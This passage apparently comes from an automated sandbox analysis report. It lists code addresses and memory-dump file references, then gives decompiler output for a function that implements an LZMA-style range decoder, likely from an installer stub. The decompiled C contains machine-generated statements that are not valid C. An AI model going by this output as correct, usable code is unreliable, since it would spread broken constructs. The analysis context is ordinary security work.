                                                                                                                          0x004063b9
                                                                                                                          0x004063bd
                                                                                                                          0x00406a02
                                                                                                                          0x00000000
                                                                                                                          0x00406a02
                                                                                                                          0x004063c3
                                                                                                                          0x004063c6
                                                                                                                          0x004063c9
                                                                                                                          0x004063cc
                                                                                                                          0x004063cf
                                                                                                                          0x004063d2
                                                                                                                          0x004063d5
                                                                                                                          0x004063d7
                                                                                                                          0x004063da
                                                                                                                          0x004063dd
                                                                                                                          0x004063e0
                                                                                                                          0x004063e2
                                                                                                                          0x004063e2
                                                                                                                          0x004063e2
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406544
                                                                                                                          0x00406544
                                                                                                                          0x00406548
                                                                                                                          0x00406a0e
                                                                                                                          0x00000000
                                                                                                                          0x00406a0e
                                                                                                                          0x0040654e
                                                                                                                          0x00406551
                                                                                                                          0x00406554
                                                                                                                          0x00406557
                                                                                                                          0x00406559
                                                                                                                          0x00406559
                                                                                                                          0x00406559
                                                                                                                          0x0040655c
                                                                                                                          0x0040655f
                                                                                                                          0x00406562
                                                                                                                          0x00406565
                                                                                                                          0x00406568
                                                                                                                          0x0040656b
                                                                                                                          0x0040656c
                                                                                                                          0x0040656e
                                                                                                                          0x0040656e
                                                                                                                          0x0040656e
                                                                                                                          0x00406571
                                                                                                                          0x00406574
                                                                                                                          0x00406577
                                                                                                                          0x0040657a
                                                                                                                          0x0040657a
                                                                                                                          0x0040657a
                                                                                                                          0x0040657d
                                                                                                                          0x0040657f
                                                                                                                          0x0040657f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004067c1
                                                                                                                          0x004067c1
                                                                                                                          0x004067c1
                                                                                                                          0x004067c5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004067cb
                                                                                                                          0x004067ce
                                                                                                                          0x004067d1
                                                                                                                          0x004067d4
                                                                                                                          0x004067d6
                                                                                                                          0x004067d6
                                                                                                                          0x004067d6
                                                                                                                          0x004067d9
                                                                                                                          0x004067dc
                                                                                                                          0x004067df
                                                                                                                          0x004067e2
                                                                                                                          0x004067e5
                                                                                                                          0x004067e8
                                                                                                                          0x004067e9
                                                                                                                          0x004067eb
                                                                                                                          0x004067eb
                                                                                                                          0x004067eb
                                                                                                                          0x004067ee
                                                                                                                          0x004067f1
                                                                                                                          0x004067f4
                                                                                                                          0x004067f7
                                                                                                                          0x004067fa
                                                                                                                          0x004067fe
                                                                                                                          0x00406800
                                                                                                                          0x00406803
                                                                                                                          0x00000000
                                                                                                                          0x00406805
                                                                                                                          0x00406582
                                                                                                                          0x00406582
                                                                                                                          0x00000000
                                                                                                                          0x00406582
                                                                                                                          0x00406803
                                                                                                                          0x00406a38
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406067
                                                                                                                          0x00406a6f
                                                                                                                          0x00406a6f
                                                                                                                          0x00000000
                                                                                                                          0x00406a6f
                                                                                                                          0x004068bc
                                                                                                                          0x00406843
                                                                                                                          0x00406840
                                                                                                                          0x00000000
                                                                                                                          0x00406477

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 17d2eea9f7cdce8bc4a623307af2d8c55e83d6c30150793070c9d330b5787031
                                                                                                                          • Instruction ID: ed496f49c15cb1a0cee1f91230a4d4bd76d3fd25087baa69d2252d5f7e71f344
                                                                                                                          • Opcode Fuzzy Hash: 17d2eea9f7cdce8bc4a623307af2d8c55e83d6c30150793070c9d330b5787031
                                                                                                                          • Instruction Fuzzy Hash: 30713271E00228CFDF28DFA8C8547ADBBB1FB44305F15806AD906BB281D7785A96DF44
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00406591, Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E00406591() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8)); // executed
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
